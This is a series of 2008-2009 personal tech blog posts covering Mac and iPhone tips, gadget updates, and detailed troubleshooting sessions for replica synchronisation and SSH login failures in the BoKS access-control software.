To make the group stand out a little bit I've worked with InkScape for a few hours. By combining the Almere coat of arms with the common logo for most Dutch OC groups I think I've managed to create something unique. Besides, I didn't feel like re-using the same low-res image all the other groups use ;) By making the logo a vector image I've guaranteed that we can resize it to -any- size without loss of quality.

EDIT:

I've set up a simple Wordpress site at opencoffeealmere.nl to act as a face to the masses.


kilala.nl tags: , , ,

View or add comments (curr. 1)

Syncing your Siemens SL78H with Mac OS X

2009-03-06 06:01:00

The Siemens SL78H DECT cordless phone sports a very nice mobile-like feature set, including Bluetooth vCard syncing. Unfortunately this doesn't work with Mac OS X out of the box, but there's a work around.

Before you start off, pair your Mac and the SL78H in the usual fashion. Turn Bluetooth on for both devices, then on the Siemens go to Bluetooth > Find device. Go through the usual song and dance. Be sure to set your Mac to be discoverable.

Here's how you go from there.

1. In Address Book, make a new list of the contacts that you want on the phone.

2. Export this list of contacts as a group vCard (File > Export).

3. Make a backup of your Address Book (File > Export > Archive).

4. Remove all of your contacts. Then import the group vCard (File > Import).

Your Address Book is now empty, except for the contacts you want to transfer to the SL78H.

5. Download vCard blaster for Mac OS X.

6. Run vCard blaster and choose to send one vCard at a time, WITH acknowledgement.

7. Click Go and acknowledge each transfer.

You're now set and all your contacts are on the SL78H. You can turn Bluetooth off again.

8. Restore your Address Book from its backup (File > Import > Archive).


kilala.nl tags: ,

View or add comments (curr. 7)

This is frustrating! Finding a Firewire extension cord

2009-03-03 10:36:00

$DEITY! All I'm trying to do is to hook up my Lacie Firewire speakers to my Powermac. The Lacies come with a non-detachable 1m FW cable, while my Mac is about 3m away.

This should of course be easily fixable with an extension cord or a hub. Right? Were it not that this is not USB, which is the VHS to Firewire's Betamax, and thus there is next to nothing usable out there for Firewire. Oh sure, Belkin has a USB/FW hub, but it rings in around 40 euros. And there's -one- extension cord available in the Netherlands, but it's a whopping 27 euros o_O

I'll go trawl eBay/Marktplaats now... See what I can come up with on the secondhand market. *sigh*

EDIT: Thank $DEITY for Kleinspul.nl who have a 6P F-F adapter which will let me hook up two cables. At about five bob apiece, that's pretty good...


kilala.nl tags: , , ,

View or add comments (curr. 3)

Using emoji on the iPhone

2009-02-04 08:38:00

A screenshot of the emoji keyboard

Hooray for Japanese silliness! For years now (I've no clue when this got started) emoji have been a staple of Japanese cellphone culture. Combining cuteness with typing efficiency, the Japanese implemented a system involving smileys and dozens of other icons in their keitai. One can cut down on the amount of words tremendously by simply stringing together a few of these symbols to form a semi-sentence.

Or as Ars Technica member Palad1 puts it:

I'm 0.59 GBP poorer but about 12.2315% hipper now that I can text the wife ":metro: :home: :cat: :sushi: :hotmonkeysex: ?". Thanks Ars, for helping me in my eternal quest for marital nooky!

There are multiple ways of getting emoji to work on your iPhone, though all of them require firmware version 2.2 or higher. Unfortunately the emoji keyboard is invisible per default outside Japan, but using apps like Typing Genius - Get emoji ($0.99) one can enable the option in System Preferences.


kilala.nl tags: , , ,

View or add comments (curr. 9)

Some of my favourite iPhone apps

2009-01-07 18:07:00

A few logos

I've had my iPhone for a few months now and can seriously say that I do not ever want to part with it! To me it's a phone, web browser and games platform in one, with a big bunch of very handy applications thrown in. I've got about fifty apps loaded, but there's only a few that see daily use. I thought I'd highlight them over here, because they deserve some extra credit :)

In no particular order, they are (where possible links go to dev site, not appstore):

* NetNewsWire, all my RSS feeds on the go.

* Trein, travel planner for the Dutch railways.

* TapTap Revenge, a free rhythm game.

* WhiteNoise, loads of soothing background sounds.

* Maps, Google Maps on the go.

* BeeTagg, clean and fast QR Code reader.

* SHOUTcast, >25.000 Internet radio stations on 3G.

* Kana, training me on kana.

* YouTube, duh :p

* World Subway Maps, photos of subway maps (like Tokyo).

The past few weeks my iPhone has really proven itself as my awesome assistant at home, at the office and on the road. I never liked full fledged PDAs or "smart phones", but for me iPhone is the perfect mix of "dumb and smart phone" :)


kilala.nl tags: , , ,

View or add comments (curr. 4)

Janus Privacy Adapter

2008-12-23 22:15:00

The JanusPA prototype

Via Clint:

The janus team have published a preview of their new privacy adapter. it's a small two port router. you just plug it in-line between your computer/switch and your internet connection. it will then anonymize all of you traffic via the tor network. you can also use it with openvpn.

I'd never heard of JanusVM before, but it seems that the team's been working on security and privacy software for Windows and Linux for quite a while now. This little piece of hardware looks very useful for when you're working in an untrusted network!

JanusPA sneak peek.


kilala.nl tags: , ,

View or add comments (curr. 0)

Updating your Parrot carkit using Parallels Desktop

2008-11-28 18:03:00

I've been using my Parrot CK3100 bluetooth carkit to my utmost satisfaction for a few years now. It worked a charm with my old Nokia handset. Once I switched to my iPhone I started having weird problems though. After half an hour driving, or maybe after a phone call or two, I wouldn't get any audio on the carkit anymore. I could make outgoing calls or receive incoming calls, but there simply wouldn't be any sound. Then after a few seconds the radio would cut back to the CD or whatever I was listening to.

I decided that the best course of action would be to re-flash my CK3100 with a newer software version. Lo and behold, the release notes for version 4.18b of the Parrot OS specifically mention the known iPhone bug in version 4.17! Goodie!

Unfortunately Parrot's updating software is only available for the Windows platform and thus, as a fervent Mac addict, I had to find a solution. Luckily I still had a Windows XP disk image for Parallels, which was working nicely. In order to get Bluetooth working under Parallels, there's a few hoops to jump through. Below you'll find the quick & dirty guide to updating your Parrot using Windows in Parallels under Mac OS X.

1. Make sure your Windows install in Parallels is working nicely. Boot it up.

2. Take the installation DVD that came with your Mac and insert it into the drive. Connect Parallels to the drive so you can read the DVD. This automatically opens an install window, which you can close.

3. Browse the contents of the DVD, going into "Boot Camp -> Drivers -> Apple".

4. Run these two installers using an admin account: AppleBluetoothInstaller and AppleBluetoothEnablerInstaller.

5. Reboot Windows. It will now automatically detect the Bluetooth hardware.

6. Go to the Parrot downloads site and download the Parrot software update tool.

7. Go to the Parrot manuals site and read the upgrading manual for your model Parrot.

8. You'll need to install the software updater under Windows. The default location is C:\Program Files\Parrot Software Update Tool.

9. Run the ParrotFlashWiz application as an admin user. You'll need to download new firmware versions into the prog-files directory and this requires admin rights.

10. Take it from there using the manual from step 7.

Presto!


kilala.nl tags: , , ,

View or add comments (curr. 1)

Finally: BoKS has a logo!

2008-11-22 20:37:00

The new BoKS logo

Since I've joined $CLIENT in October my life has been nothing but BoKS, BoKS, BoKS. It's great to be working with FoxT's security software again :) A lot of things have changed over the years, though the software is still very, very familiar.

One of the things that's made me happy is that Fox Tech have -finally- made an official logo for their BoKS products! I find it odd that they've been marketing this software for over ten years and that their last logo dates back to the nineties. Said decrepit logo hasn't been used in ages and hence BoKS was just known by that: a plain text rendition of the name. By request of $CLIENT, Fox Tech have gotten off their hineys and created a new logo that matches their corporate identity.

As a side note: over the past few weeks I've seen a lot of in-depth troubleshooting and I've decided to share some of the stuff I've learnt. Hence you'll find that the BoKS part of the sysadmin section has been revamped :)


kilala.nl tags: , , ,

View or add comments (curr. 0)

BoKS troubleshooting: another example of a debugging session

2008-11-22 20:29:00

Original issues

As I mentioned at the end of example 1 the problem with the seemingly random login denials was caused by a misbehaving replica server. We tracked the problem down to REPHOST, where we discovered that three of the database tables were not in sync with the rest. A number of hosts were being reported as non-existent, which was causing login problems for our users.

Now that we've figured out which server was giving us problems and what the symptoms were, we needed to figure out what was causing the issues.

Symptoms

One of our replica servers had three database tables that were not getting any updates. Their sequence numbers as reported by "boksdiag sequence" were very different from the sequence numbers on the master, indicating nastiness.

Diagnosis

1. Verify the sequence numbers again

Just to be sure that the replica is still malfunctioning, let's check the sequence numbers again.

On the master:

BoKS > boksdiag sequence
...
T7 13678d 8:33:46 5053 (5053)
...
T9 13178d 11:05:23 7919 (7919)
...
T15 13178d 11:03:16 1865 (1865)
...

On the replica (REPHOST):

BoKS > boksdiag sequence
...
T7 13678d 8:33:46 6982 (6982)
...
T9 13178d 11:05:23 10258 (10258)
...
T15 13178d 11:03:16 2043 (2043)

Yup, it's still broken :) You may notice that the sequence numbers on the replica are actually AHEAD of the numbers on the master server.

2. Demoting the replica to client status

Because I was not sure what had been done to REPHOST in the past I wanted to reset it completely, without reinstalling the software. I knew that the host had been involved in a disaster recovery test a few months before, so I had a hunch that something'd gone awry in the conversion between the various host states.

Hence I chose to convert the replica back to client status.

BoKS> sysreplace restore



BoKS> convert -v client

Stopping daemons...

Setting BOKSINIT=client in ENV file...

Restarting daemons...

Conversion from replica to client done.



BoKS > cd /var/opt/boksm



BoKS > tail -20 boks_errlog

...

WARNING: Dying on signal SIGTERM
boks_authd Nov 17 14:59:30
INFO: Shutdown by signal SIGTERM
boks_csspd@REPHOST Nov 17 14:59:30
INFO: Shutdown by signal SIGTERM
boks_authd Nov 17 14:59:30
INFO: Min idle workers 32
boks_csspd@REPHOST Nov 17 14:59:30
INFO: Min idle workers 32



BoKS > sysreplace replace

I verified that all the BoKS processes running are newly created and that there are no stragglers from before the restart. Also, I tried to SSH to the replica to make sure that I could still log in.

3. Change the replica's type in the database

The BoKS master server will also need to know that the replica is now a client. In order to do this I needed to change the host's TYPE in the database. Initially I tried doing this with the following command.

BoKS> hostadm -a -h REPHOST -t UNIXBOKSHOST

Unfortunately this command refused to work, so I chose to modify the host type through the BoKS webinterface. Just a matter of a few clicks here and there. Afterwards the BoKS master was aware that the replica was no more.

BoKS > boksdiag list

Server      Since last pckt   Since last fail   Since last sync   Count     Last status
REPHOST5    00:49             523d 5:19:20      04:49             1853521   ok
REPHOST4    00:49             136d 22:21:35     04:49             526392    ok
REPHOST3    00:49                               04:50             726768    ok
REPHOST2    00:49             107d 5:05:33      04:49             425231    ok
REPHOST     02:59             02:13             11:44             148342    down

It'll take a little while for REPHOST's entry to completely disappear from the "boksdiag list" output. I sped things up a little bit by restarting the BoKS master using the "Boot -k" and "Boot" commands.

4. Reconvert the host back to a replica

Of course I wanted REPHOST to be a replica again, so I changed the host type in the database using the webinterface.

I then ran the "convert" command on REPHOST to promote the host again.

BoKS > convert -v replica

Checking to see if a master can be found...

Stopping daemons...

Setting BOKSINIT=replica in ENV file...

Restarting daemons...

Conversion from client to replica done.



BoKS > ps -ef | grep -i boks

root 16543 16529 0 15:14:33 ? 0:00 boks_bridge -xn -s -l servc.s -Q !/etc/opt/boksm!.servc!servc_queue -q /etc/opt

root 16536 16529 0 15:14:33 ? 0:00 boks_servc -p1 -xn -Q !/etc/opt/boksm!.xservc1!xservc_queue

root 16535 16529 0 15:14:33 ? 0:00 boks_servm -xn

root 16529 1 0 15:14:33 ? 0:00 boks_init -f /etc/opt/boksm/boksinit.replica

root 16540 16529 0 15:14:33 ? 0:00 boks_bridge -xn -r -l servc.r -Q /etc/opt/boksm/xservc_queue -P servc -k -K /et

root 16552 16529 0 15:14:33 ? 0:00 boks_csspd -e/var/opt/boksm/boks_errlog -x -f -c -r 600 -l -k -t 32 -i 20 -a 15

root 16533 16529 0 15:14:33 ? 0:00 boks_bridge -xn -s -l master.s -Q /etc/opt/boksm/master_queue -P master -k -K /

...

...



BoKS > cd ..



BoKS > tail boks_errlog

boks_authd Nov 17 14:59:30
INFO: Min idle workers 32
boks_csspd@REPHOST Nov 17 14:59:30
INFO: Min idle workers 32
boks_init@REPHOST Mon Nov 17 15:02:21 2008
WARNING: Respawn process sshd exited, reason: exit(1). Process restarted.
boks_init@REPHOST Mon Nov 17 15:14:31 2008
WARNING: Dying on signal SIGTERM
boks_aced Nov 17 15:14:33
ERROR: Unable to access configuration file /var/ace/sdconf.rec



On the master server I saw that the replica was communicating with the master again.

BoKS > boksdiag list

Server      Since last pckt   Since last fail   Since last sync   Count     Last status
REPHOST5    04:35             523d 5:33:41      06:39             1853555   ok
REPHOST4    04:35             136d 22:35:56     06:42             526426    ok
REPHOST3    04:35                               06:43             726802    ok
REPHOST2    04:35             107d 5:19:54      06:41             425265    ok
REPHOST     01:45             16:34             26:05             0         new

Oddly enough REPHOST was not receiving any real database updates. I also noticed that the sequence numbers for the local database copy hadn't changed. This was a hint that stuck in the back of my head, but I didn't pursue it at the time. Instead I expected there to be some problem with the communications bridges between the master and REPHOST.

BoKS > ls -lrt

...

...

-rw-r----- 1 root root 0 Nov 17 15:14 copsable.dat

-rw-r----- 1 root root 0 Nov 17 15:14 cert2user.dat

-rw-r----- 1 root root 0 Nov 17 15:14 cert.dat

-rw-r----- 1 root root 0 Nov 17 15:14 ca.dat

-rw-r----- 1 root root 0 Nov 17 15:14 authenticator.dat

-rw-r----- 1 root root 0 Nov 17 15:14 addr.dat



BoKS >

5. Verify that everything's okay on the replica

I was rather confused by now. Because REPHOST wasn't getting database updates I thought to check the following items.

Everything seemed completely fine! It was time to break out the big guns.

6. Clear out the database

I decided to clear out the whole local copy of the database, to make sure that REPHOST had a clean start.

BoKS > Boot -k



BoKS > cd /var/opt/boksm



BoKS > tar -cvf data.20081117.tar data/*

a data/ 0K

a data/crypt_spool/ 0K

a data/crypt_spool/clntd/ 0K

a data/crypt_spool/clntd/ba_fbuf_LCK 0K

a data/crypt_spool/clntd/ba_fbuf_0000000004 6K

a data/crypt_spool/clntd/ba_fbuf_0000000003 98K

a data/crypt_spool/servc/ 0K

a data/crypt_spool/servm/ 0K

...



BoKS > cd data



BoKS > rm *.dat



BoKS > Boot

Checking the contents of /var/opt/boksm/data immediately afterwards showed that BoKS had re-created the database table files. Some of them were getting updates, but over 90% of the tables remained completely empty.

7. Debugging the communications bridges

As explained in this article it's possible to trace the internal workings of just about every BoKS process. This includes the various communications bridges that connect the BoKS hosts.

I'd decided to use "bdebug" on the "servm_r" and "servm" processes on REPHOST, while also debugging "drainmast" and "drainmast_s" on the master server. The flow of data starts at drainmast, the goes through drainmast_s and servm_r to finally end up in servm on the replica. Drainmast is what sends data to replicas and servm is what commits the received changes to the local database copy.

Unfortunately the trace output didn't show anything remarkable, so I won't go over the details.

8. Calling in tech support

By now I'd drained all my inspiration. I had no clue what was going on and I was one and a half hours into an incident that should've taken half an hour to fix. Since I always say that one should know one's limitations I decided to call in Fox Tech tech support. Because it was already 1600 and I wanted to have the issue resolved before I went home I called their international support number.

I submitted all the requested files to my engineer at FoxT, who was still investigating the case around 1800. Unfortunately things had gone a bit wrong in the handover between the day and the night shift, so my case had gotten lost. I finally got a call back from an engineer in the US at 2000. I talked things over with him and something in our call triggered that little voice stuck in the back of my head: sequence numbers!

The engineer advised me to go ahead and clear the sequence numbers file on REPHOST. At the same time I also deleted the database files again for a -really- clean start.

BoKS > Boot -k



BoKS > cd /var/opt/boksm



BoKS > tar -cvf data.20081117-2.tar data/*

...



BoKS > cd data



BoKS > rm *.dat



BoKS > rm sequence



BoKS > Boot

Lo and behold! The database copy on REPHOST was being updated! All of the tables were getting filled again, including the three tables that had been stuck from the beginning.

The engineer informed me that in BoKS 6.5 the "convert" command is supposed to clear out the database and sequence file when demoting a master/replica to client status. Apparently this is NOT done automatically in BoKS versions 6.0 and lower.

In conclusion

We discovered that the host had at one point in time played the role of master server and that there was still some leftover crap from that time. During REPHOST's time as the master the sequence numbers for tables 7, 9 and 15 had gotten ahead of the sequence numbers of the real master which was turned off at the time. This had happened because these three tables were edited extensively during the original master's downtime. This in turn led to these tables never getting updated.

After the whole mess was fixed we concluded that the following four steps are all you need to restart your replica in a clean state.

  1. Stop the BoKS software on REPHOST.
  2. Delete all the .dat files in $BOKS_var/data.
  3. Delete the sequence file from $BOKS_var/data.
  4. Restart the BoKS software on REPHOST
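In shell terms, those four steps boil down to something like this (a sketch, using the default /var/opt/boksm paths from the rest of this article):

# On the misbehaving replica, in a BoKS shell:
BoKS > Boot -k                            # 1. stop the BoKS software
BoKS > cd /var/opt/boksm
BoKS > tar -cvf data.backup.tar data/*    # keep a copy, just in case
BoKS > cd data
BoKS > rm *.dat                           # 2. delete the database tables
BoKS > rm sequence                        # 3. delete the sequence file
BoKS > Boot                               # 4. restart; the master pushes a fresh database copy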

I've also asked the folks at Fox Tech to issue a bugfix request to their developers. As I mentioned in step 1, the sequence numbers on the replica were ahead of those on the master. Realistically speaking this should never happen, but BoKS does not currently recognize said situation as a failure.

In the meantime I will write a monitoring script for Nagios and Tivoli that will monitor the proper replication of the BoKS database.
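As a first stab, such a check could simply compare the per-table record counts between the master and a replica and complain when the gap gets too big. A rough, untested sketch of the idea, run from the master (the replica name, the ten-record threshold and the field positions are assumptions on my part):

#!/bin/sh
# Crude BoKS replication check: compare "boksdiag sequence" counts per table.
REPLICA=REPHOST
THRESHOLD=10
MASTER_SEQ=/tmp/seq.master

/opt/boksm/sbin/boksadm -S boksdiag sequence | grep "^T" > $MASTER_SEQ

ssh $REPLICA "/opt/boksm/sbin/boksadm -S boksdiag sequence" | grep "^T" | \
while read TABLE AGE TIME COUNT REST
do
    MASTER_COUNT=`grep "^$TABLE " $MASTER_SEQ | awk '{print $4}'`
    [ -z "$MASTER_COUNT" ] && continue
    DIFF=`expr $MASTER_COUNT - $COUNT`
    [ $DIFF -lt 0 ] && DIFF=`expr $COUNT - $MASTER_COUNT`
    if [ $DIFF -gt $THRESHOLD ]
    then
        echo "WARNING: replica $REPLICA table $TABLE differs by $DIFF records"
    fi
done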


kilala.nl tags: , ,

View or add comments (curr. 0)

BoKS troubleshooting: an example of a debugging session

2008-11-21 21:52:00

Recently we ran into a rather perplexing problem: a few of our customers had intermittent login problems. There seemed to be no pattern to this issue, with users from different departments being denied access to their servers at random points in time. Sometimes the problem would go away after a few hours, sometimes it took a few days. It took a few days before the penny dropped and we found out that one of our replica servers was misbehaving.

The paragraphs below outline my diagnosis and troubleshooting procedure.

Original issues

The issues seemed to focus on servers in one specific, physical location.

One of our DBAs created several incidents over the course of a month regarding login issues with user sybase@SYBHOST. Initially this problem was fixed by adding the "ssh_pk" authenticator, but the problem returned with intermittent login denial without an apparent reason.

A number of users from another department indicated intermittent login problems where they were allowed to log in one day and denied access the next. My troubleshooting of the problem hadn't given me any real results so far. I'd run debugging on SSH sessions, which didn't clear much up.

For the remainder of this document I will focus on my troubleshooting process for the case involving user sybase.

Symptoms

These denials occur at seemingly random intervals and result in varying BoKS error messages. Most frequent is the rather useless "ERR 223, no authentication" which, as Fox Tech confirms, tells us absolutely nothing. At other times users receive an "ERR 203, no access route" even though said user does in fact have the requisite access routes.

Diagnosis

1. Map out the flow of data in this case.

In this case the DBAs attempt to use SSH (with keypair authentication) from sybase@UNIXHOST, to sybase@SYBHOST.

2. Verify the access routes involved in the exchange.

The BoKS database shows that both hosts are part of the hostgroup SYBASE.

BoKS > hgrpadm -l | grep UNIXHOST

...

SYBASE UNIXHOST

TRUSTED UNIXHOST

...



BoKS > hgrpadm -l | grep SYBHOST

...

SYBASE SYBHOST

TRUSTED SYBHOST

...

The BoKS database shows that user sybase is allowed SSH inside hostgroup SYBASE.

BoKS > sx /opt/boksm/sbin/boksadm -S dumpbase -t 2 | grep SYBASE:sybase

RUSER="SYBASE:sybase" ROUTE="ssh*:TRUSTED->SYBASE"

...

RUSER="SYBASE:sybase" ROUTE="ssh*:ANY/SYBASE->SYBASE"

...

3. Verify the authentication methods involved in the exchange.

The BoKS database confirms that sybase is allowed to use SSH keypairs.

BoKS > sx /opt/boksm/sbin/boksadm -S dumpbase -t 31 | grep SYBASE:sybase

RLOGNAME="SYBASE:sybase" TYPE="ssh_pk" VERSION="1.0" FLAGS="1"

4. Check the SSH keypair.

The public key of sybase@UNIXHOST is correctly installed in the authorized_keys file of user sybase@SYBHOST.

sybase@UNIXHOST > cat ~/.ssh/id_dsa.pub

ssh-dss AAAAB3NzaC1kc3MAAACBANSl ... WjUgDlUEIA5g== sybase@UNIXHOST



sybase@SYBHOST > cat ~/.ssh/authorized_keys

ssh-dss AAAAB3NzaC1kc3MAAACBAPd/ ... 8Cbt3Gl9hvTa== sybase@OTHERHOST

ssh-dss AAAAB3NzaC1kc3MAAACBANSl ... WjUgDlUEIA5g== sybase@UNIXHOST

The permissions on the .ssh directory for sybase@SYBHOST are also correct.

sybase@SYBHOST > ls -al ~/.ssh

drwx------ 2 sybase sybase 96 Aug 15 2007 .

drwxr-xr-x 3 sybase sybase 8192 Sep 12 15:58 ..

-rw------- 1 sybase sybase 1210 Oct 27 10:53 authorized_keys

5. Run SSH debug traces.

Because things seem alright so far, it's time to check out what's going wrong on the inside of BoKS. The first step to take is to run an additional debugging SSH daemon. This can be done using the following command. Key here are the multiple -d flags and "-p 2222".

BoKS > /opt/boksm/lib/boks_sshd -d -d -d -D -g120 -p 2222 >/tmp/Trace.txt 2>&1

The customer is now instructed to attempt a login to port 2222 by adding "-p 2222" to his usual SSH command. This should of course still fail, but this time we can get a trace.
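On the client side that test is nothing fancier than (a sketch, using the hostnames from this case):

sybase@UNIXHOST > ssh -p 2222 sybase@SYBHOST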

The trace output file gets pretty long because it not only shows the SSH debug information, but also debugging for the BoKS internals. After going through the hostkey exchange, BoKS will start authentication by requesting valid authentication methods.

debug2: userauth-request for user sybase service ssh-connection method none

debug2: input_userauth_request: setting up authctxt for sybase

...

debug2: get_opt_authmethod_from_servc: INSIDE - user = sybase, need_privsep = 0

debug2: boks_servc_call_vec: INSIDE boks_sshd@SYBHOST[6] 14 Nov 11:21:24:026533 in servc_call_str: To server: {FUNC=route-stat-user FROMUSER = sybase ROUTE = SSH:192.168.0.181->?HOST TOHOST=?HOST TOUSER=sybase FROMHOST = 192.168.0.181}

...

boks_sshd@SYBHOST[6] 14 Nov 11:21:24:264031 in servc_call_str: Return: {FUNC=route-stat-user FROMUSER=sybase ROUTE=SSH:192.168.0.181->?HOST TOHOST=?HOST TOUSER=sybase FROMHOST=192.168.0.181 $HOSTSYM=SYBHOST $ADDR=192.168.40.165 $SERVCADDR=192.168.23.9 METHODS=ssh_pk $SERVCVER=6.0.3}

debug2: get_opt_authmethod_from_servc: Must use BokS authentication methods: "ssh_pk"

debug2: get_opt_authmethod_from_servc: BokS optional authentication methods: ""

debug2: boks_ssh_restrict_authmethods: INSIDE - orginal authmethods = publickey,keyboard-interactive

debug2: boks_ssh_restrict_authmethods: DONE - returning methods = publickey

debug2: userauth-request for user

This confirms that authentication using SSH keypairs is allowed and is actually enforced. The key is now checked and (after some fidgeting) accepted.

debug2: input_userauth_request: try method publickey

debug1: trying public key file /home/sybase/.ssh/authorized_keys

...

debug2: userauth_pubkey: authenticated 1 pkalg ssh-dss

Accepted publickey for sybase from 192.168.0.181 port 63569 ssh2

Now that the user has been authenticated, BoKS will check his access routes. Sadly this returns with ERR 203 (no access route).

boks_sshd@SYBHOST[6] 14 Nov 11:21:24:304336 in servc_call_str: To server: {FUNC=auth FROMUSER=sybase ROUTE=SSH:192.168.0.181->?HOST TOHOST=?HOST TOUSER=sybase FROMHOST=192.168.0.181 $ssh_pk=ok}

...

boks_sshd@SYBHOST[6] 14 Nov 11:21:24:314704 in servc_call_str: Return: {FUNC=auth FROMUSER=sybase ROUTE=SSH:UNIXHOST->SYBHOST TOHOST=SYBHOST TOUSER=sybase FROMHOST=192.168.0.181 $ssh_pk=ok01$HOSTSYM=SYBHOST $ADDR=192.168.40.165 $SERVCADDR=192.168.23.9 WC=#$*-./?_ UKEY=SYBASE:sybase MOD_CONV=1 SEC_USER=sybase VTYPE=ssh_pk MODLIST=optional_ssh_pk=+1,psw=+1,prompt=-1,timeout=+1,login=+1,verbose=+1 $STATE=6 ERROR=-203 $SERVCVER=6.0.3}

debug3: boks_ssh_do_authorization: Servc auth failed ERROR = -203

6. Force client to use one replica.

Please note that the SSH debug trace above shows that address 192.168.23.9 is used for the servc calls. This indicates that the client is communicating with replica REPHOST. In order to further aid the troubleshooting process it's best to force the client to communicate with just this one replica.

BoKS > cd /etc/opt/boksm

BoKS > vi bcastaddr



DONT_BROADCAST

ADDRESS_LIST

192.168.23.9 REPHOST.domain

~

~

:wq



BoKS > Boot -k

BoKS > Boot

7. Run a trace on the BoKS communications

Just to play it safe, we'll need to check that the client's request is sent and received properly. This can be done by running a BoKS debug on the "bridge_servc_[s|r]" processes, "s" being on the sending side and "r" on the receiving end.

Once again we'll be asking the customer to SSH to the system. However, right before he executes his command we'll run the following two commands.

Client: bdebug bridge_servc_s -x 9 -f /tmp/servcs.out

Replica: bdebug bridge_servc_r -x 9 -f /tmp/servcr.out

Right after the customer's SSH session is killed again we'll run the following commands.

Client: bdebug bridge_servc_s -x 0

Replica: bdebug bridge_servc_r -x 0

The two resulting files will be rather large and hard to read. Both log should only be given a cursory glance as they only pertain to the BoKS communications itself. In this case the logs indicate no problems at all, though they might have shown problems with hostkeys or network connectivity.

8. Run a trace on the BoKS database processing

Again we will ask the customer to attempt another (failed) login through SSH. This time we will trace another subset of BoKS, the "servc" process which handles the actual database lookup and verification.

Right before the client executes his SSH we'll run the following command.

Replica: bdebug servc -x 9 -f /tmp/servc-trace.out

Right after the customer's SSH session is killed again we'll run the following command.

Replica: bdebug servc -x 0

The resulting log file will most likely be huge as it will contain all authentication requests handled by the replica during the trace. In order to get to the part of the log that is of interest to us it's best to do a search for the username (sybase). The first entry that we'll find is part of the setup of the authentication request.

servc@REPHOST[3] 14 Nov 11:43:35:660033 in servc_func_1: From client (SYBHOST) {FUNC=route-stat-user FROMUSER=sybase ROUTE=SSH:192.168.0.181->?HOST TOHOST=?HOST TOUSER=sybase FROMHOST=192.168.0.181}

BoKS will now go through a rather lengthy process of identifying the parties involved, which includes some BoKS-database and DNS voodoo to identify the hosts and their hostgroups. It's important to read all the log entries, searching for errors.
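Since the trace file is huge, it helps to grep it down before reading it line by line; something along these lines (a sketch, the keywords simply match the messages quoted below):

egrep -i "error|mismatch|no match" /tmp/servc-trace.out | more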

Having ascertained the identity of the parties involved, BoKS will start checking the appropriate access routes for the user. In this case you will see that BoKS will go over the access routes found at step 2 one by one. As part of this list it will also go over the access route that should have given sybase SSH access. However, instead we see the following.

14 Nov 11:43:35:930834 in fetchrec: Reading record from tab 2 at offset 1878504 (688 bytes)

14 Nov 11:43:35:931016 in get_route_key: got "ssh*:ANY/SYBASE->SYBASE"

14 Nov 11:43:35:931150 in am_methodcmp: ssh* == SSH ?

14 Nov 11:43:35:931254 in am_methodcmp: yes

14 Nov 11:43:35:931354 in hosttype_cmp: wild = ANY/SYBASE, host = UNIXHOST

14 Nov 11:43:35:931453 in domexpand: Enter. host="ANY/SYBASE"

...



14 Nov 11:43:35:931863 in domexpand: Return. "ANY/SYBASE.domain"

14 Nov 11:43:35:931963 in domexpand: Enter. host="UNIXHOST"

...

14 Nov 11:43:35:932367 in domexpand: Return. "UNIXHOST.domain"

...

14 Nov 11:43:35:932721 in host_wild_cmp: wild (SYBASE.domain) is a hostgroup

14 Nov 11:43:35:932824 in hostgroup_match_sub: enter

14 Nov 11:43:35:933336 in hostgroup_match_sub: no match

14 Nov 11:43:35:933641 in get_route_key: mismatch

This indicates that BoKS thinks that host UNIXHOST is not part of hostgroup SYBASE, even though we already confirmed that this is in fact the case (see step 2). This would seem to indicate that there are problems with the local copy of the BoKS database on replica REPHOST.

We won't have to continue reading the log file any further.

9. Verify data in database on faulty replica.

Suspecting database problems on the replica we check the following.

BoKS > hgrpadm -l | grep UNIXHOST

...

SYBASE UNIXHOST

TRUSTED UNIXHOST

...

Oddly enough the "hgrpadm" command, which interacts with the database, returns the proper results. However, dumping the local tables shows that we have problems.

BoKS > dumpbase -t 7 | grep UNIXHOST

BoKS > dumpbase -t 9 | grep UNIXHOST

BoKS > dumpbase -t 15 | grep UNIXHOST

10. Verifying the synchronisation status of the database

Run the following command on both the master server and the replica. Compare the figures for each table, looking for any discrepancies. A difference less than ten is alright, but anything in the dozens or higher is a problem. In this case I found the following.

On the master:

BoKS > boksdiag sequence
...
T7 13678d 8:33:46 5053 (5053)
...
T9 13178d 11:05:23 7919 (7919)
...
T15 13178d 11:03:16 1865 (1865)
...

On the replica (REPHOST):

BoKS > boksdiag sequence
...
T7 13678d 8:33:46 6982 (6982)
...
T9 13178d 11:05:23 10258 (10258)
...
T15 13178d 11:03:16 2043 (2043)
...

This indicates that there are indeed synchronisation problems between this replica server and the master server.

11. Verifying the synch status of other replicas

Now that we've ascertained that there's one replica that's running badly, it's a good idea to check the other replicas as well. Run the "boksdiag sequence" command on the other replicas and verify the figures again.

In this case the figures for the other replicas all look fine, with one exception: REPHOST2 complains about database locking issues. Said error messages also pop up when running "dumpbase" commands on that replica, indicating software errors on that host as well.

boksdiag@REPLICA: INTERNAL DYNDB ERROR in blockbase(): Can't lock database

errno = 28, No space left on device

boksdiag@sREPLICA: INTERNAL DYNDB ERROR in bunlockbase(): Can't unlock database

errno = 28, No space left on device

T0 12549d 6:39:06 94193 (94193)

T1 13907d 7:13:45 637314 (637314)

...

 

In conclusion

In the end the problem was in fact down to REPHOST being out of synch with the rest of the BoKS domain. The troubleshooting continues with example 2.


kilala.nl tags: , ,

View or add comments (curr. 0)

BoKS troubleshooting: SSH daemon and client

2008-11-21 21:13:00

At $CLIENT we found that almost 60% of our time was being spent on troubleshooting SSH or SFTP in one of its many forms. Because each problem -seemed- unique we kept on reinventing the wheel, costing us precious time. To cut down on this I've set up a short procedure that should help in diagnosing the problem. I've also made a list of various symptoms that are linked to rather rare scenarios.

Troubleshooting example 1 also covers most of these steps with some sample output for additional detail.

Standard procedure is to follow these steps:

  1. Check the BoKS transaction log.
  2. Check the user's access rights.
  3. Check for authentication methods.
  4. Check the user's SSH keypair.

This should actually be enough to handle 70% of the cases. For the rest there's more:



1. Check the BoKS transaction log

While this may sound painfully obvious, the best place to see why a user cannot login is the BoKS transaction log. For each login request handled by BoKS these files will contain a log entry. It's easiest to search for the combination of hostname and username and to use the BoKS log parser to make the output legible.

For example:

$ for FILE in `ls -lrt | grep "Dec 13" | awk '{print $9}'`

> do

> grep $HOSTNAME $FILE | grep $USER | /opt/boksm/sbin/bkslog -f -

> done

Using either the output of the parsed BoKS log, or the list of error codes it should be trivial to find out what's going wrong. The most common errors in our environment are the following:



2. Check the user's access rights

As was mentioned, in the case of a 200, 201 or 203 you'll have to check whether the user actually has access to the requested resource. Crosscheck the following:

One of the most useful commands will be:

